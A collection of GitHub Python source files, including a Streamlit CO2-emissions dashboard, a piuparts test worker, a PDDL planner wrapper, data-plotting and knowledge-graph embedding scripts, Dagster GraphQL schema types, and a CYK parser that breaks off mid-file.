col2.selectbox('', ['Trend', 'Cumulative'])\n\n df_world = pd.DataFrame()\n if len(select_list_country) == 0:\n df_world = dataframe[dataframe['iso_code'] == 'OWID_WRL']\n elif len(select_list_country) > 0:\n df_world = dataframe[dataframe['country'] == select_list_country]\n\n fig_line = go.Figure()\n if select_mode == 'Trend':\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['co2'],\n name='World CO2', # Style name/legend entry with html tags\n connectgaps=True, # override default to connect the gaps\n line_shape='spline',\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['trade_co2'],\n name='Trade CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cement_co2'],\n name='Cement CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['coal_co2'],\n name='Coal CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['flaring_co2'],\n name='Flaring CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['gas_co2'],\n name='GAS CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['oil_co2'],\n name='Oil CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['other_industry_co2'],\n name='Other industry CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n elif select_mode == 'Cumulative':\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_co2'],\n name='Cumulative CO2', # Style name/legend entry with html tags\n connectgaps=True, # override default to connect the gaps\n line_shape='spline',\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_coal_co2'],\n name='Cumulative Coal CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_cement_co2'],\n name='Cumulative cement CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_flaring_co2'],\n name='Cumulative flaring CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_gas_co2'],\n name='Cumulative GAS CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.add_trace(go.Scatter(\n x=df_world['year'],\n y=df_world['cumulative_oil_co2'],\n name='Cumulative Oil CO2',\n line_shape='spline',\n line=dict(dash='dash'),\n fill='tonexty'\n ))\n fig_line.update_layout(\n title='Time series of CO2 emission with sub-sectors (' + select_list_country + ') (' + select_mode + ')',\n legend=dict(y=1, font_size=14),\n xaxis=dict(rangeslider=dict(visible=True),\n title_font=dict(size=20))\n )\n return fig_line\n\n\ndata1_co2 = load_data()\n\n# page layout setting\nst.header('COMPX532A - Final Project')\nst.subheader('Purpose of the project')\nst.text(chart_desciption.project_background())\nst.subheader('Data Source Description')\nst.info(chart_desciption.data_information())\n\ndf = trim_datasets(data1_co2)\nmin_y, max_y = get_df_year_mx_mi(df)\n\n# side bar setting\nst.sidebar.header('Setting Option')\nselect_year = st.sidebar.slider('Year', min_y, max_y, max_y, 1)\nselect_country = st.sidebar.multiselect('Select Country:', df['country'].unique().tolist())\n# st.sidebar.write(len(data1_co2['country'].unique().tolist()))\n\n# filter dataframe by select country\nif len(select_country) > 0:\n df = df[df['country'].isin(select_country)]\nelif len(select_country) == 0:\n pass\ncheck_box_show(df)\nst.subheader(\"CO2 Emission in the world\")\ndf, df_columns_list = control_dataframe(df)\ndf_columns_list.pop()\n# add select box of select sector in side bar\nselect_co2_sector = st.sidebar.selectbox('Select sector in CO2 Emission', df_columns_list)\nst.sidebar.write('🧠 Created by Andrew Choi.
©Copyright reserved.',unsafe_allow_html=True)\n\n\n\n# plot the graph\nst.plotly_chart(get_co2_choropleth_map(df, select_year, select_co2_sector))\nwith st.beta_expander(\"🗺️Choropleth Map Explanation\"):\n st.markdown(chart_desciption.choropleth_map_explanation(), unsafe_allow_html=True)\n\n#explanation of Bar chart\nst.plotly_chart(show_bar_top_low_10(df, select_co2_sector, select_year))\nwith st.beta_expander(\"📊 Top 10/ Lowest 10 Bar chart Explanation\"):\n st.markdown(chart_desciption.top_low_bar_chart_explanation(), unsafe_allow_html=True)\n\n#explanation of Scatter chart\nst.altair_chart(show_scatter_gdp_vs_pop(data1_co2, select_co2_sector, select_year), use_container_width=True)\nwith st.beta_expander(\"🔵🔴 Scatter chart (Relationship among CO2, GDP, Population) Explanation\"):\n st.markdown(chart_desciption.scatter_chart_explanation(), unsafe_allow_html=True)\n\n#explanation of line chart\nst.plotly_chart(show_line_chart(data1_co2), use_container_width=True)\nwith st.beta_expander(\"📈 Line chart (trend/accumulated of CO2 emission) Explanation\"):\n st.markdown(chart_desciption.line_chart_explanation(), unsafe_allow_html=True)\n\n#Animated bar chart\nst.subheader(\"Animated Bar chart (shows the volume/change over time)\")\nwith st.spinner('Please wait, it is generating'):\n try:\n st.plotly_chart(animated_bar(data1_co2, select_co2_sector), use_container_width=True)\n except:\n st.error(\"You have select a sector that no animated graph.\")\n\nwith st.beta_expander(\"🏃‍♂️🏃‍♀️📊Animated Bar chart (change over time) Explanation\"):\n st.markdown(chart_desciption.animated_bar_explanation(), unsafe_allow_html=True)","repo_name":"choi0623hk/DataVisualisation_CO2_emission","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37350037959","text":"import logging\nimport os\nimport uuid\nfrom contextlib import (\n ExitStack,\n)\n\nfrom vectis.apt import (\n AptSource,\n)\nfrom vectis.worker import (\n ContainerWorker,\n FileProvider,\n HostWorker,\n InteractiveWorker,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass Binary:\n\n def __init__(\n self,\n name,\n *,\n deb=None):\n self.deb = deb\n self.name = name\n\n def __str__(self):\n return self.name\n\n\nclass PiupartsWorker(FileProvider, ContainerWorker):\n\n def __init__(\n self,\n *,\n architecture,\n mirrors,\n suite,\n tarball,\n components=(),\n extra_repositories=(),\n worker=None):\n super().__init__(mirrors=mirrors, suite=suite)\n\n if worker is None:\n worker = self.stack.enter_context(HostWorker())\n\n self.__bound = set()\n self.__cached_copies = {}\n self.apt_related_argv = []\n self.argv = [\n 'piuparts',\n '--arch',\n architecture,\n '-b',\n tarball,\n ]\n self.components = components\n self.extra_repositories = extra_repositories\n self.worker = worker\n\n assert isinstance(self.worker, InteractiveWorker)\n\n def _open(self):\n super()._open()\n self.set_up_apt()\n\n def set_up_apt(self):\n argv = []\n\n for ancestor in self.suite.hierarchy:\n if self.components:\n filtered_components = (\n set(self.components) & set(ancestor.all_components))\n else:\n filtered_components = ancestor.components\n\n uri = self.mirrors.lookup_suite(ancestor)\n\n source = AptSource(\n components=filtered_components,\n suite=ancestor.apt_suite,\n type='deb',\n trusted=ancestor.apt_trusted,\n uri=uri,\n )\n\n if ancestor is self.suite.hierarchy[-1]:\n logger.info(\n '%r: %s => -d %s --mirror %s',\n self, ancestor, source.suite,\n source.get_piuparts_mirror_option())\n argv.append('-d')\n argv.append(source.suite)\n argv.append('--mirror')\n argv.append(source.get_piuparts_mirror_option())\n else:\n logger.info('%r: %s => %s', self, ancestor, source)\n argv.append('--extra-repo')\n argv.append(str(source))\n\n for line in self.extra_repositories:\n argv.append('--extra-repo')\n argv.append(line)\n\n self.apt_related_argv = argv\n self.install_apt_keys()\n\n def install_apt_key(self, apt_key):\n logger.debug('TODO: piuparts does not have an option to install '\n 'apt keys')\n\n def call_piuparts(\n self,\n *,\n binaries,\n output_dir=None):\n\n packages = []\n\n for b in binaries:\n if b.deb is None:\n packages.append(b.name)\n else:\n packages.append(self.make_file_available(b.deb))\n\n argv = self.argv[:]\n\n for b in binaries:\n if b.deb is None:\n argv.append('--apt')\n break\n\n if output_dir is not None:\n argv.append('-l')\n argv.append(output_dir + '/piuparts.log')\n\n return (self.worker.call(argv + self.apt_related_argv + packages) == 0)\n\n def new_directory(self, prefix='', tmpdir=None):\n # assume /tmp is initially empty and mktemp won't collide\n d = self.worker.new_directory(prefix, tmpdir)\n self.argv.append('--bindmount={}'.format(d))\n self.__bound.add(d)\n return d\n\n def make_file_available(\n self,\n filename,\n *,\n cache=False,\n in_dir=None,\n owner=None):\n if in_dir is None:\n in_dir = self.new_directory()\n\n if cache:\n in_guest = self.__cached_copies.get((filename, in_dir))\n if in_guest is not None:\n return in_guest\n\n unique = str(uuid.uuid4())\n in_guest = self.worker.make_file_available(\n filename, cache=cache, in_dir=in_dir)\n\n if in_dir not in self.__bound:\n self.argv.append('--bindmount={}/{}'.format(in_dir, unique))\n\n if cache:\n self.__cached_copies[(filename, in_dir)] = in_guest\n\n return in_guest\n\n def make_dsc_file_available(self, filename, owner=None):\n d, f = self.worker.make_dsc_file_available(filename)\n self.argv.append('--bindmount={}'.format(d))\n return d, f\n\n def make_changes_file_available(self, filename, owner=None):\n d, f = self.worker.make_changes_file_available(filename)\n self.argv.append('--bindmount={}'.format(d))\n return d, f\n\n\ndef run_piuparts(\n *,\n components,\n mirrors,\n storage,\n suite,\n tarballs,\n vendor,\n worker,\n architecture=None,\n binaries=(),\n extra_repositories=(),\n output_logs=None):\n failures = []\n # We may need to iterate these more than once\n binaries = list(binaries)\n\n with ExitStack() as stack:\n stack.enter_context(worker)\n worker.check_call([\n 'env',\n 'DEBIAN_FRONTEND=noninteractive',\n 'apt-get',\n '-y',\n '-t', worker.suite.apt_suite,\n 'install',\n\n 'piuparts',\n ])\n\n for basename in tarballs:\n tarball = os.path.join(\n storage,\n architecture,\n str(vendor),\n str(suite.hierarchy[-1]),\n basename)\n\n if not os.path.exists(tarball):\n logger.info('Required tarball %s does not exist',\n tarball)\n continue\n\n piuparts = stack.enter_context(\n PiupartsWorker(\n architecture=architecture,\n components=components,\n extra_repositories=extra_repositories,\n mirrors=mirrors,\n suite=suite,\n tarball=worker.make_file_available(\n tarball, cache=True),\n worker=worker,\n )\n )\n\n for mode in ('install-purge',):\n if output_logs is None:\n output_dir = None\n else:\n output_dir = os.path.join(\n output_logs,\n 'piuparts_{}_{}_{}'.format(\n mode, basename, architecture))\n\n output_on_worker = worker.new_directory()\n\n if not piuparts.call_piuparts(\n binaries=binaries,\n output_dir=output_on_worker,\n ):\n if output_dir is None:\n failures.append(mode)\n else:\n failures.append(output_dir)\n\n if output_dir is not None:\n worker.copy_to_host(\n os.path.join(output_on_worker, ''),\n os.path.join(output_dir, ''),\n )\n\n return failures\n","repo_name":"smcv/vectis","sub_path":"vectis/piuparts.py","file_name":"piuparts.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3732371005","text":"import subprocess\nimport os\nfrom highlevel_planning_py.exploration.logic_tools import parse_plan\n\n\ndef pddl_planner(domain_file, problem_file, action_specs, bin_dir, debug_print=False):\n try:\n res = subprocess.check_output(\n [\n os.path.join(bin_dir, \"ff\"),\n \"-s\",\n \"0\",\n \"-o\",\n domain_file,\n \"-f\",\n problem_file,\n ]\n )\n if type(res) is not str:\n res = res.decode(\"utf-8\")\n except subprocess.CalledProcessError as e:\n # Check if empty plan solves it\n output = e.output if type(e.output) is str else e.output.decode(\"utf-8\")\n empty_idx = output.find(\"The empty plan solves it\")\n if empty_idx > -1:\n # print(\"Empty plan solves the goal.\")\n return []\n else:\n if debug_print:\n print(\"Planning failed: \")\n print(output)\n return False\n try:\n res = cut_string_before(res, \"ff: found legal plan as follows\", complain=True)\n except NameError:\n # print(\"Planning failed: \")\n # print(res)\n return False\n try:\n res = cut_string_before(res, \"0:\", complain=True)\n except NameError:\n # Empty plan solves this problem\n return []\n res = cut_string_at(res, \"time spent\")\n res = res.split(\"\\n\")\n for i in range(len(res)):\n res[i] = res[i].strip().lower()\n while True:\n try:\n res.remove(\"\")\n except ValueError:\n break\n # print(res)\n sequence, parameters = parse_plan(res, action_specs)\n return sequence, parameters\n\n\ndef cut_string_before(string, query, complain=False):\n # Finds query in string and cuts everything before it.\n start_idx = string.find(query)\n if start_idx > -1:\n string = string[start_idx:]\n elif complain:\n raise NameError(\"Query not found\")\n return string\n\n\ndef cut_string_at(string, query):\n # Finds query in string and cuts it away, together with everything that comes behind.\n start_idx = string.find(query)\n if start_idx > -1:\n string = string[:start_idx]\n return string\n","repo_name":"ethz-asl/high_level_planning","sub_path":"highlevel_planning_ros/src/highlevel_planning_py/pddl_interface/planner_interface.py","file_name":"planner_interface.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3194599588","text":"import utils as ut\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\n\n# Moving average for GPU data (generalize later)\n\n# Pick a machine\nmachine = \"GPU\" # \"CPU\"\nfile_prefix = \"vec_ops.n6_g1_c7_a1.\"\n# file_path = \"vec-ops-latency\"\nfile_path = \"waitforgpu-latency\"\n\n# machine = \"CPU\"\n# file_prefix = \"vec_ops.n2_g0_c21_p42.\"\n# file_path = \"cpu-flush-cache\"\n\n# Pick an operation \n# operation = \"VecDot\"\n# count = 1\noperation = \"VecAXPY\"\ncount = 3\n\n# Get the data\nsm = range(1000, 100001, 100)\nmd = range(100000, 10000001, 10000) \nlg = range(10000000, 100000001, 100000)\nvec_sizes = sm + md + lg\n\nall_data = []\nfor size in vec_sizes:\n\tall_data.append(float(ut.get_time(\"../data/\" + file_path + \"/\" + file_prefix + str(size), operation, count)))\n\n# Compute the moving average\nspan_size = 10\ninternal_sizes = vec_sizes[span_size: -span_size]\nmoving_average = []\n\nfor vec_size in internal_sizes: # Loop through internal data\n\tind = vec_sizes.index(vec_size) # Get place in global vector\n\tmoving_data = all_data[ind - span_size: ind + span_size] # Get local data from global data\n\tavg = sum(moving_data)/len(moving_data) # Compute average of local data\n\tmoving_average.append(avg)\n\n# Make the plot\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.plot(vec_sizes, all_data, linestyle=\"none\", marker=\".\", color=\"grey\", label=\"Data\")\nplt.plot(internal_sizes, moving_average, color=\"black\", label=\"Moving average\")\nplt.title(machine + \" \" + operation + \" execution time\", fontsize=12)\nplt.xlabel(\"Vector size\", fontsize=12)\nplt.ylabel(\"Seconds\", fontsize=12)\nplt.legend(loc=\"upper left\", fontsize=12, frameon=False)\n# plt.xscale('log')\n# plt.xlim([8e2, 1.2e7])\n# ax.ticklabel_format(axis=\"both\", style=\"sci\", scilimits=(0,0))\n# ax.xaxis.set_major_locator(plt.MaxNLocator(5))\n\nplt.tight_layout()\n# plt.savefig(\"../plots/\" + operation + \"_\" + machine + \"_moving_average.png\")\nplt.show()\n","repo_name":"hmmorgan/summit","sub_path":"python/moving-average.py","file_name":"moving-average.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70878856808","text":"import argparse\nimport os\nimport pandas as pd\nimport sys\nimport torch\n\nfrom OpenKE.openke.module.model import TransE, TransR, TransH, SimplE\nfrom OpenKE.openke.data import TrainDataLoader, TestDataLoader\n\n\ndef load_embeddings(_fb_path, _model_path, _dim, _mt):\n train_dataloader = TrainDataLoader(in_path=_fb_path,\n nbatches=100,\n threads=1,\n sampling_mode=\"normal\",\n bern_flag=1,\n filter_flag=1,\n neg_ent=25,\n neg_rel=0)\n if _mt == 'transe':\n transe = TransE(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim=_dim,\n p_norm=1,\n norm_flag=True)\n transe.load_checkpoint(_model_path)\n _ent_embds = transe.ent_embeddings.weight\n _rel_embds = transe.rel_embeddings.weight\n elif _mt == 'transr':\n transr = TransR(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim_e=_dim,\n dim_r=_dim,\n p_norm=1,\n norm_flag=True)\n transr.load_checkpoint(_model_path)\n _ent_embds = transr.ent_embeddings.weight\n _rel_embds = transr.rel_embeddings.weight\n elif _mt == 'transh':\n transh = TransH(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim=_dim,\n p_norm=1,\n norm_flag=True)\n transh.load_checkpoint(_model_path)\n _ent_embds = transh.ent_embeddings.weight\n _rel_embds = transh.rel_embeddings.weight\n elif _mt == 'simple':\n simple = SimplE(ent_tot=train_dataloader.get_ent_tot(),\n rel_tot=train_dataloader.get_rel_tot(),\n dim=_dim)\n simple.load_checkpoint(_model_path)\n _ent_embds = simple.ent_embeddings.weight\n _rel_embds = simple.rel_embeddings.weight\n return _ent_embds, _rel_embds\n\n\ndef run_and_save(_dim, _mt, _ds):\n wd = os.path.normpath(os.getcwd() + os.sep + os.pardir)\n if _ds == 'riedel':\n fb_path = os.path.join(wd, \"data\", \"RESIDE_KG/\")\n elif _ds == 'gids':\n fb_path = os.path.join(wd, \"data\", \"GIDS_KG/\")\n else:\n print('Invalid data set, please run the preprocessing steps.')\n sys.exit()\n if _mt == 'transr':\n model_path = os.path.join(wd, \"kg-embeddings\", \"checkpoints\", \"{m}_{d}_{d}_{s}.ckpt\".format(m=_mt,\n d=_dim,\n s=_ds))\n else:\n model_path = os.path.join(wd, \"kg-embeddings\", \"checkpoints\", \"{m}_{d}_{s}.ckpt\".format(m=_mt,\n d=_dim,\n s=_ds))\n out_path = os.path.join(wd, \"kg-embeddings\", \"data\")\n entity_emb, rel_emb = load_embeddings(fb_path, model_path, _dim, _mt)\n torch.save(entity_emb, os.path.join(out_path, 'entities_{m}_{d}_{s}.pt'.format(m=str(_mt), d=_dim, s=_ds)))\n torch.save(rel_emb, os.path.join(out_path, 'relations_{m}_{d}_{s}.pt'.format(m=str(_mt), d=_dim, s=_ds)))\n print(entity_emb.shape)\n print(rel_emb.shape)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(prog=\"build_node_space\",\n description=\"Builds vector spaces of kg embeddings\")\n parser.add_argument('-d', '--dimension', required=False, type=int, default=200,\n help='Embedding dimension for h, r and t',\n dest='dim')\n parser.add_argument('-m', '--model', required=True, type=str, default='transe',\n help='Knowledge graph embedding model type',\n dest='mt')\n parser.add_argument('-s', '--set', required=True, type=str, default='reside',\n help='Dataset type type',\n dest='ds')\n args = parser.parse_args()\n run_and_save(args.dim, args.mt, args.ds)\n","repo_name":"akalino/semantic-structural-sentences","sub_path":"kg-embeddings/build_node_space.py","file_name":"build_node_space.py","file_ext":"py","file_size_in_byte":4540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71227742888","text":"from video_capture import C_VIDEO_UNIT\nfrom preprocessing import C_PREPROCESSING\nfrom Object_detection import C_DETECTION\nfrom tracking import C_TRACKER\nfrom setting import *\nfrom utils import *\nimport cv2\nfrom Detection_Models.YOLO import C_DETECTION_YOLO as YOLO\n# \n# @track\ndef main():\n # groundtruth_box = C_PREPROCESSING.VOT2013_read_groundtruth_file(FILE_ADDRESS_DEEP_GROUNDTHRUTH)\n \n detection = C_DETECTION(DETECTION_METHOD)\n\n video = C_VIDEO_UNIT(INPUT_VIDEO_SNOURCE)\n\n acc_per_frame = []\n ret, frame = video.get_frame()\n image_size = frame.shape \n frame_number = 0\n time_sum = 0\n\n while True:\n ret, frame = video.get_frame()\n\n frame_number += 1\n if not ret:\n break\n \n print(frame_number)\n # Preprocessing \n # frame = C_PREPROCESSING.resize(frame, min(400, frame.shape[1]))\n # frame = C_PREPROCESSING.Color_Conversion(frame,\"GRAY\") //deep network needs the color image. If we feed grayscale image, there will be error in code.\n\n\n # t1 = time.time()\n \n # Detection\n predicted_box,frame = detection.Detection_BoundingBox(frame)\n if frame_number % 20 == 0:\n print(\"change detection method to Deep_YOLO\")\n detection.Switch_detection(\"Deep_Yolo\")\n if frame_number % 40 == 0:\n print(\"change detection method to HOG_Pedestrian\")\n detection.Switch_detection(\"HOG_Pedestrian\")\n # DETECTION_METHOD = \"Deep_Yolo\"\n\n # t2 = time.time()\n # time_sum += t2-t1\n\n # gt = correct_position(groundtruth_box[frame_number-1])\n # tmpgt = correct_position(groundtruth_box[frame_number-1])\n # cv2.rectangle(frame, (gt[0], gt[1]), (gt[2],gt[3]), (0,0,0),0)\n # max_idx, max_acc = 0, 0\n # for i, bb in enumerate(predicted_box):\n # accuracy = box_iou2(correct_position(bb), correct_position(gt))\n # if max_acc0:\n # pb = correct_position(predicted_box[max_idx])\n # cv2.rectangle(frame, (pb[0], pb[1]), (pb[2],pb[3]), (155,255,12),1)\n \n \n # Post Processing\n # frame = C_PREPROCESSING.Color_Conversion(frame,\"GRAY\")\n \n # Output \n cv2.imshow(\"output\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break #esc to quit\n\n # print(\"average acc:\",np.average(acc_per_frame),\", max acc: \",max(acc_per_frame),\", min acc: \",min(acc_per_frame), \", number of frames with zero accuracy: \",len(acc_per_frame)-np.count_nonzero(acc_per_frame))\n # print(\"The average processing time for every frame is\",np.divide(time_sum, frame_number, dtype=np.float), 'and the total number of frames is ', frame_number)\n # print('Also, the total frames (size=',image_size,') are processin in ',time_sum,'seconds')\n cv2.destroyAllWindows() \n return 2\n \nif __name__ == \"__main__\": \n # t1=time.time() \n a=main()\n # t2=time.time()\n # print('pipeline time:', t2-t1)\n \n\n \n","repo_name":"mmoha014/Video-Analytics-system","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":3176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72878842088","text":"#link : https://codeforces.com/problemset/problem/1481/A\n#author : Mohamed Ibrahim\n\nt = int(input())\nfor i in range(t):\n x,y = map(int,input().split())\n s = input()\n if -s.count(\"D\") <= y <= s.count(\"U\") and -s.count(\"L\") <= x <= s.count(\"R\"):print(\"YES\")\n else:print(\"NO\")\n \n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"CodeForces/A. Space Navigation.py","file_name":"A. Space Navigation.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"9886431847","text":"import dagster._check as check\nimport graphene\nfrom dagster._core.host_representation import ExternalExecutionPlan\nfrom dagster._core.snap import ExecutionStepInputSnap, ExecutionStepOutputSnap, ExecutionStepSnap\n\nfrom .metadata import GrapheneMetadataItemDefinition\nfrom .util import ResolveInfo, non_null_list\n\n\nclass GrapheneExecutionStepOutput(graphene.ObjectType):\n name = graphene.NonNull(graphene.String)\n\n class Meta:\n name = \"ExecutionStepOutput\"\n\n def __init__(self, step_output_snap):\n super().__init__()\n self._step_output_snap = check.inst_param(\n step_output_snap, \"step_output_snap\", ExecutionStepOutputSnap\n )\n\n def resolve_name(self, _graphene_info: ResolveInfo):\n return self._step_output_snap.name\n\n\nclass GrapheneExecutionStepInput(graphene.ObjectType):\n name = graphene.NonNull(graphene.String)\n dependsOn = non_null_list(lambda: GrapheneExecutionStep)\n\n class Meta:\n name = \"ExecutionStepInput\"\n\n def __init__(self, step_input_snap, external_execution_plan):\n super().__init__()\n self._step_input_snap = check.inst_param(\n step_input_snap, \"step_input_snap\", ExecutionStepInputSnap\n )\n self._external_execution_plan = check.inst_param(\n external_execution_plan, \"external_execution_plan\", ExternalExecutionPlan\n )\n\n def resolve_name(self, _graphene_info: ResolveInfo):\n return self._step_input_snap.name\n\n def resolve_dependsOn(self, _graphene_info: ResolveInfo):\n return [\n GrapheneExecutionStep(\n self._external_execution_plan,\n self._external_execution_plan.get_step_by_key(key),\n )\n # We filter at this layer to ensure that we do not return outputs that\n # do not exist in the execution plan\n for key in filter(\n self._external_execution_plan.key_in_plan,\n self._step_input_snap.upstream_step_keys,\n )\n ]\n\n\nclass GrapheneStepKind(graphene.Enum):\n COMPUTE = \"COMPUTE\"\n UNRESOLVED_MAPPED = \"UNRESOLVED_MAPPED\"\n UNRESOLVED_COLLECT = \"UNRESOLVED_COLLECT\"\n\n class Meta:\n name = \"StepKind\"\n\n @property\n def description(self):\n if self == GrapheneStepKind.COMPUTE:\n return \"This is a user-defined computation step\"\n if self == GrapheneStepKind.UNRESOLVED_MAPPED:\n return \"This is a mapped step that has not yet been resolved\"\n if self == GrapheneStepKind.UNRESOLVED_COLLECT:\n return \"This is a collect step that is not yet resolved\"\n else:\n return None\n\n\nclass GrapheneExecutionStep(graphene.ObjectType):\n key = graphene.NonNull(graphene.String)\n inputs = non_null_list(GrapheneExecutionStepInput)\n outputs = non_null_list(GrapheneExecutionStepOutput)\n solidHandleID = graphene.NonNull(graphene.String)\n kind = graphene.NonNull(GrapheneStepKind)\n metadata = non_null_list(GrapheneMetadataItemDefinition)\n\n class Meta:\n name = \"ExecutionStep\"\n\n def __init__(self, external_execution_plan, execution_step_snap):\n super().__init__()\n self._external_execution_plan = check.inst_param(\n external_execution_plan, \"external_execution_plan\", ExternalExecutionPlan\n )\n self._plan_snapshot = external_execution_plan.execution_plan_snapshot\n self._step_snap = check.inst_param(\n execution_step_snap, \"execution_step_snap\", ExecutionStepSnap\n )\n\n def resolve_metadata(self, _graphene_info: ResolveInfo):\n return [\n GrapheneMetadataItemDefinition(key=mdi.key, value=mdi.value)\n for mdi in self._step_snap.metadata_items\n ]\n\n def resolve_inputs(self, _graphene_info: ResolveInfo):\n return [\n GrapheneExecutionStepInput(inp, self._external_execution_plan)\n for inp in self._step_snap.inputs\n ]\n\n def resolve_outputs(self, _graphene_info: ResolveInfo):\n return [GrapheneExecutionStepOutput(out) for out in self._step_snap.outputs]\n\n def resolve_key(self, _graphene_info: ResolveInfo):\n return self._step_snap.key\n\n def resolve_solidHandleID(self, _graphene_info: ResolveInfo):\n return self._step_snap.node_handle_id\n\n def resolve_kind(self, _graphene_info: ResolveInfo):\n return self._step_snap.kind.value\n\n\nclass GrapheneExecutionPlan(graphene.ObjectType):\n steps = non_null_list(GrapheneExecutionStep)\n artifactsPersisted = graphene.NonNull(graphene.Boolean)\n\n class Meta:\n name = \"ExecutionPlan\"\n\n def __init__(self, external_execution_plan):\n super().__init__()\n self._external_execution_plan = check.inst_param(\n external_execution_plan, external_execution_plan, ExternalExecutionPlan\n )\n\n def resolve_steps(self, _graphene_info: ResolveInfo):\n return [\n GrapheneExecutionStep(\n self._external_execution_plan,\n self._external_execution_plan.get_step_by_key(step.key),\n )\n for step in self._external_execution_plan.get_steps_in_plan()\n ]\n\n def resolve_artifactsPersisted(self, _graphene_info: ResolveInfo):\n return self._external_execution_plan.execution_plan_snapshot.artifacts_persisted\n\n\ntypes = [\n GrapheneExecutionPlan,\n GrapheneExecutionStep,\n GrapheneExecutionStepInput,\n GrapheneExecutionStepOutput,\n GrapheneStepKind,\n]\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-graphql/dagster_graphql/schema/execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"21858699284","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Apr 28 13:20:19 2022\r\n\r\n@author: Dang Dinh NGUYEN\r\n\"\"\"\r\n\r\nimport os\r\nimport time\r\nfrom tabulate import tabulate\r\nEPSILON = \"&\"\r\n\r\n########################################################################\r\n########################################################################\r\n\r\nclass FileHandler:\r\n\r\n def __init__(self):\r\n pass\r\n\r\n def readFile(self, filePath):\r\n lines=[]\r\n if(os.path.isfile(filePath)):\r\n try:\r\n with open(filePath) as file:\r\n lines = [line.rstrip() for line in file]\r\n except IOError as e:\r\n print(\"File could not be opened.\")\r\n exit(0)\r\n else:\r\n print('{} :File was not found in the specified path.'.format(filePath))\r\n exit(0)\r\n return lines\r\n\r\n def parseFile(self,lines):\r\n ''' \r\n Line 1 to end: Productions in form of\r\n (Current State -> Next State)\r\n '''\r\n productions = lines[0:]\r\n for i in range(len(productions)):\r\n productions[i] = productions[i].rstrip().split('->')\r\n\r\n parsedLines = {'productions':productions}\r\n return parsedLines\r\n \r\nclass CYK:\r\n def __init__(self):\r\n pass\r\n \r\n def isRecognised(self, inputString, parsedLines):\r\n n = len(inputString)\r\n productions = parsedLines['productions']\r\n source = productions[1][0]\r\n print(\"source \", source)\r\n table = [[set([]) for i in range(n)] for j in range(n)] \r\n \r\n for j in range(0,n):\r\n for production in productions:\r\n lhs = production[0]\r\n rhs = production[1]\r\n #print('{}\\t {}'.format(lhs, rhs))\r\n if (len(rhs) == 1 and rhs.islower()) and rhs == inputString[j]:\r\n table[j][j].add(lhs)\r\n \r\n for i in range(j,-1,-1):\r\n for k in range(i,j+1):\r\n for production in productions:\r\n lhs = production[0]\r\n rhs = production[1] \r\n try:\r\n if (len(rhs) == 2) and (rhs[0] in table[i][k]) and (rhs[1] in table[k + 1][j]):\r\n table[i][j].add(lhs)\r\n except:\r\n 